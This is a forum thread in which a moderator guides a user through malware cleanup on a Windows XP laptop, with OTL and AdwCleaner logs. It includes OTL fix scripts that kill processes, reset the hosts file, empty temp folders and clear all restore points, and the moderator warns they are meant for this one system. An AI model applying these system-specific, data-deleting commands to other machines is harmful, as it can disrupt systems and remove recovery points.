DRV - [2014/01/16 17:36:16 | 000,040,392 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{67104415-DB2E-4EEE-A982-8BE24EE49BEE}\MpKslacaf0d79.sys -- (MpKslacaf0d79)
DRV - [2010/10/29 09:14:44 | 002,649,216 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\BCMWL5.SYS -- (BCM43XX)
DRV - [2008/04/13 20:42:44 | 000,169,984 | ---- | M] (Cisco Systems) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\pcx500.sys -- (PCX500)
DRV - [2007/12/23 16:18:48 | 000,068,696 | ---- | M] (O2Micro) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\oz776.sys -- (guardian2)
DRV - [2007/05/10 09:24:34 | 001,222,840 | ---- | M] (SigmaTel, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\sthda.sys -- (STHDA)
DRV - [2006/08/04 15:39:10 | 000,008,192 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\XAudio.sys -- (XAudio)
DRV - [2005/10/26 09:01:02 | 000,142,720 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\b57xp32.sys -- (b57w2k)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant =
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 74 B9 FC 8B 2B B8 CD 01 [binary data]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant =
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...Box&Form=IE8SRC
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.defaultenginename: "Ixquick HTTPS"
FF - prefs.js..browser.search.selectedEngine: "Ixquick HTTPS"
FF - prefs.js..browser.search.useDBForOrder: ""
FF - prefs.js..browser.startup.homepage: "https://ixquick.com/"
FF - user.js - File not found

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF - HKLM\Software\MozillaPlugins\@rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5: C:\Documents and Settings\All Users\Application Data\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.2: C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/12/11 15:22:01 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013/12/11 15:22:06 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{1266764D-FC4F-4FA7-B63B-884D53B1680F}: C:\Documents and Settings\Administrator\Application Data\NetAssistant\ [2011/10/05 17:24:24 | 000,000,000 | ---D | M]

[2013/09/01 22:05:03 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Extensions
[2014/01/15 17:02:45 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions
[2013/12/11 15:22:02 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2013/12/11 15:22:02 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2013/12/11 15:21:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\browser\extensions
[2013/12/11 15:21:59 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2013/12/11 15:23:12 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2012/06/16 07:17:28 | 000,085,472 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/04/20 20:18:25 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2012/04/20 20:18:25 | 000,002,040 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - Extension: saveansHare = C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\ocgoejamkoggkmcieekgaahloaembkbc\5.10\

O1 HOSTS File: ([2014/01/16 15:22:07 | 000,000,098 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O4 - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe (Ahead Software Gmbh)
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [NVHotkey] C:\WINDOWS\System32\nvhotkey.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [nwiz] C:\WINDOWS\System32\nwiz.exe ()
O4 - HKLM..\Run: [OtShot] C:\Program Files\OtShot\otshot.exe -minimize File not found
O4 - HKLM..\Run: [REGSHAVE] C:\Program Files\REGSHAVE\REGSHAVE.EXE (FUJI PHOTO FILM CO., LTD.)
O4 - HKLM..\Run: [SigmatelSysTrayApp] C:\Program Files\SigmaTel\C-Major Audio\WDM\stsystra.exe (SigmaTel, Inc.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ExifLauncher2.lnk = C:\Program Files\FinePixViewer\QuickDCF2.exe (FUJIFILM Corporation)
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 157
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1DA2D542-9DB1-4ED2-83DB-7E6787DD9A25}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3D27322F-F708-4BD9-BFB0-B4DBBD8B4353}: DhcpNameServer = 192.168.1.1 192.168.0.1
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Desktop Background.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Desktop Background.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2011/04/15 14:00:56 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

========== Files/Folders - Created Within 30 Days ==========

[2014/01/15 17:09:27 | 001,037,068 | ---- | C] (Thisisu) -- C:\Documents and Settings\Administrator\Desktop\JRT.exe
[2014/01/15 16:53:49 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2013/12/28 17:37:42 | 000,000,000 | ---D | C] -- C:\WINDOWS\Minidump

========== Files - Modified Within 30 Days ==========

[2014/01/16 18:41:00 | 000,000,830 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2014/01/16 17:36:41 | 000,000,153 | RHS- | M] () -- C:\Documents and Settings\All Users\Application Data\3002.xml
[2014/01/16 15:35:34 | 000,000,384 | -H-- | M] () -- C:\WINDOWS\tasks\Microsoft Antimalware Scheduled Scan.job
[2014/01/16 15:26:27 | 000,000,664 | ---- | M] () -- C:\WINDOWS\System32\d3d9caps.dat
[2014/01/16 15:25:58 | 000,017,408 | ---- | M] () -- C:\WINDOWS\System32\rpcnetp.exe
[2014/01/16 15:25:54 | 000,069,792 | ---- | M] (Absolute Software Corp.) -- C:\WINDOWS\System32\rpcnet.dll
[2014/01/16 15:25:30 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2014/01/16 15:22:07 | 000,000,098 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\Hosts
[2014/01/15 17:15:53 | 001,037,068 | ---- | M] (Thisisu) -- C:\Documents and Settings\Administrator\Desktop\JRT.exe
[2014/01/15 16:52:31 | 001,236,282 | ---- | M] () -- C:\Documents and Settings\Administrator\Desktop\AdwCleaner.exe
[2014/01/14 18:57:29 | 000,000,512 | ---- | M] () -- C:\Documents and Settings\Administrator\Desktop\MBR.dat
[2014/01/13 08:51:37 | 000,001,374 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2013/12/26 16:25:23 | 000,000,719 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\VLC media player.lnk
[2013/12/26 16:23:31 | 024,097,311 | ---- | M] () -- C:\Documents and Settings\Administrator\My Documents\vlc-2.1.2-win32.exe
[2013/12/20 09:27:52 | 000,000,174 | ---- | M] () -- C:\Documents and Settings\Administrator\Desktop\Chris Kepner Guitar E-mail.rtf

========== Files Created - No Company Name ==========

[2014/01/15 16:50:32 | 001,236,282 | ---- | C] () -- C:\Documents and Settings\Administrator\Desktop\AdwCleaner.exe
[2014/01/14 18:57:29 | 000,000,512 | ---- | C] () -- C:\Documents and Settings\Administrator\Desktop\MBR.dat
[2013/12/26 16:21:14 | 024,097,311 | ---- | C] () -- C:\Documents and Settings\Administrator\My Documents\vlc-2.1.2-win32.exe
[2013/12/20 09:27:52 | 000,000,174 | ---- | C] () -- C:\Documents and Settings\Administrator\Desktop\Chris Kepner Guitar E-mail.rtf
[2013/07/10 22:15:57 | 000,000,153 | RHS- | C] () -- C:\Documents and Settings\All Users\Application Data\3002.xml
[2013/07/10 22:15:45 | 000,019,472 | RHS- | C] () -- C:\Documents and Settings\All Users\Application Data\3002.abs
[2012/08/30 17:32:17 | 000,000,664 | ---- | C] () -- C:\WINDOWS\System32\d3d9caps.dat
[2012/08/13 20:12:44 | 000,000,136 | ---- | C] () -- C:\Documents and Settings\Administrator\Local Settings\Application Data\fusioncache.dat
[2012/08/13 19:58:10 | 000,112,260 | ---- | C] () -- C:\WINDOWS\hpoins07.dat.temp
[2012/08/13 19:58:10 | 000,021,124 | ---- | C] () -- C:\WINDOWS\hpomdl07.dat.temp
[2012/05/22 19:41:16 | 000,049,152 | ---- | C] () -- C:\WINDOWS\Domino.exe
[2012/05/16 18:21:29 | 000,015,872 | ---- | C] () -- C:\Documents and Settings\Administrator\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/05/16 10:18:32 | 000,000,069 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
[2011/11/15 00:25:53 | 000,320,526 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-S-1-5-21-515967899-1604221776-1417001333-500-0.dat
[2011/11/15 00:25:52 | 000,185,618 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-System.dat

========== Alternate Data Streams ==========

@Alternate Data Stream - 127 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:430C6D84
@Alternate Data Stream - 124 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:80337C03
@Alternate Data Stream - 109 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:DFC5A2B2

< End of report >
  • 0

#10
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Could you now run AdwCleaner press Scan, once the scan has completed press Clean then post that log

Then :

Warning This fix is only relevant for this system and no other, using on another computer may cause problems

Be advised that when the fix commences it will shut down all running processes and you may lose the desktop and icons, they will return on reboot

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following
    Posted Image
:Commands
[CREATERESTOREPOINT]

:OTL
O4 - HKLM..\Run: [OtShot] C:\Program Files\OtShot\otshot.exe -minimize File not found


:Commands
[resethosts]
[emptytemp]
[Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done


On completion of this can you let me know how the computer is behaving
  • 0

Advertisements


#11
monkeyboyblues

monkeyboyblues

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 146 posts
# AdwCleaner v3.017 - Report created 17/01/2014 at 16:10:36
# Updated 12/01/2014 by Xplode
# Operating System : Microsoft Windows XP Service Pack 3 (32 bits)
# Username : Administrator - LATITUDED620
# Running from : C:\Documents and Settings\Administrator\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094
Key Deleted : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\305B09CE8C53A214DB58887F62F25536

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.6001.18702


-\\ Mozilla Firefox v26.0 (en-US)

[ File : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\prefs.js ]


-\\ Google Chrome v

[ File : C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [38273 octets] - [15/01/2014 16:53:55]
AdwCleaner[R1].txt - [1374 octets] - [17/01/2014 16:09:37]
AdwCleaner[S0].txt - [38160 octets] - [15/01/2014 17:02:19]
AdwCleaner[S1].txt - [1299 octets] - [17/01/2014 16:10:36]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [1359 octets] ##########


All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\OtShot deleted successfully.
========== COMMANDS ==========
C:\WINDOWS\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYTEMP]

User: Administrator
->Temp folder emptied: 678313 bytes
->Temporary Internet Files folder emptied: 22543895 bytes
->FireFox cache emptied: 13742364 bytes
->Flash cache emptied: 707 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes

User: NetworkService
->Temp folder emptied: 8074 bytes
->Temporary Internet Files folder emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 5552 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 35.00 mb


OTL by OldTimer - Version 3.2.53.0 log created on 01172014_161446

Files\Folders moved on Reboot...

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • 0

#12
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
How is the computer behaving now ?
  • 0

#13
monkeyboyblues

monkeyboyblues

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 146 posts
Everything seems back to normal!

Thanks man, I thoroughly appreciate it!!

Edited by monkeyboyblues, 17 January 2014 - 05:45 PM.

  • 0

#14
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
In that case methinks I will send you on your merry way :)

Subject to no further problems :)

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself so..The following will implement some cleanup procedures as well as reset System Restore points:

Run AdwCleaner and select uninstall

Delete JRT from the desktop

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following
    Posted Image

:Commands
[CLEARALLRESTOREPOINTS] 
[resethosts]
[emptytemp]
[Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done


Run OTL and hit the cleanup button. It will remove all the programmes we have used plus itself.

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware

Posted Image


Malwarebytes.

Update and run weekly to keep your system clean

Download and install FileHippo update checker and run it monthly it will show you which programmes on your system need updating and give a download link

If you use on-line banking then as an added layer of protection install Trusteer Rapport

It is critical to have both a firewall and anti virus to protect your system and to keep them updated. To keep your operating system up to date visit
To learn more about how to protect yourself while on the internet read our little guide How did I get infected in the first place ?Keep safe :wave:
  • 0

#15
monkeyboyblues

monkeyboyblues

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 146 posts
I have Microsoft Security Essentials and it is up to date.

Is that sufficient for antivirus/firewall protection?
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP